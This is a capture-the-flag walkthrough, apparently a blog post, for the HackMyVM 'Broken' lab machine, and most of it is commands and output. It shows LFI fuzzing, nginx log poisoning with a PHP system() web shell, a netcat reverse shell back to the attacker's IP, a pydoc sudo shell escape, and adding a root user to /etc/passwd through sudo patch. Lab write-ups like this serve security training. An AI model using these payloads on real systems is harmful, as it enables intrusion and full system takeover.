HackMyVm Broken Walkthrough

HackMyVm Broken Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Broken

Scan ports.

 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 1b:8d:f3:e3:56:64:af:54:df:10:f8:39:ac:ad:c9:2f (RSA)
 |   256 77:c1:f3:e4:6b:96:0f:1e:5c:24:2e:4d:3e:4a:09:80 (ECDSA)
 |_  256 88:05:ef:7a:04:56:f0:59:62:a5:f8:40:32:24:8a:17 (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 1 disallowed entry
 |_/textpattern
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).


Scan port 80.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log 
 ...
 /index.html           (Status: 200) [Size: 3]
 /file.php             (Status: 200) [Size: 0]
 /robots.txt           (Status: 200) [Size: 23]


robots.txt told us there is textpattern cms.

 cat robots.txt  
 Disallow: /textpattern


Fuzz file.php for LFI.

 wfuzz -u 'http://broken/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/seclists/Discov
 ery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000007535:   200        27 L     40 W       1451 Ch     "file"  


Check passwd.

 curl 'http://broken/file.php?file=../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 heart:x:1000:1000:heart,,,:/home/heart:/bin/bash
 ...


Write shell code into nginx log file through agent string.

 curl 'http://broken' -A '<?php system($_GET[c]); ?>'   
 :(


Check if shell code works.

 curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=id'
 ...
 192.168.56.150 - - [26/May/2021:22:44:55 -0400] "GET / HTTP/1.1" 200 3 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)


Try get reverse shell code.

 curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'


In another terminal, listen to port and get shell.

 nc -nlvp 1234                                                                                                                                                                                 fish-0 | 0 [20:49:51]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:50004.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Check sudo.

 ww-data@broken:~/html/textpattern/textpattern$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on broken:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User www-data may run the following commands on broken:
     (heart) NOPASSWD: /usr/bin/pydoc3.7


Run pydoc3.7 to get shell.

 www-data@broken:/home/heart$ sudo -u heart /usr/bin/pydoc3.7 os
 ...
 :!/bin/sh
 ...
 $ id
 id
 uid=1000(heart) gid=1000(heart) groups=1000(heart),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 $ pwd
 pwd
 /home/heart
 $


Check sudo again.

 heart@broken:~$ sudo -l
 Matching Defaults entries for heart on broken:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User heart may run the following commands on broken:
     (ALL) NOPASSWD: /usr/bin/patch


Use patch  to insert a new user root2 in /etc/passwd with root priviledge.

 heart@broken:~$ cp /etc/passwd ./passwd_new
 heart@broken:~$ openssl passwd mypass
 qQdUCJYw6ARL6
 heart@broken:~$ echo 'root2:qQdUCJYw6ARL6:0:0:root:/root:/bin/bash' >> passwd_new
 heart@broken:~$ diff -u /etc/passwd ./passwd_new > passwd_patch
 heart@broken:~$ sudo patch -i ./passwd_patch /etc/passwd
 patching file /etc/passwd
 heart@broken:~$ su root2
 Password:
 root@broken:/home/heart# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 broken
 root@broken:/home/heart#




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年5月    »
1
2345678
9101112131415
16171819202122
23242526272829
3031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2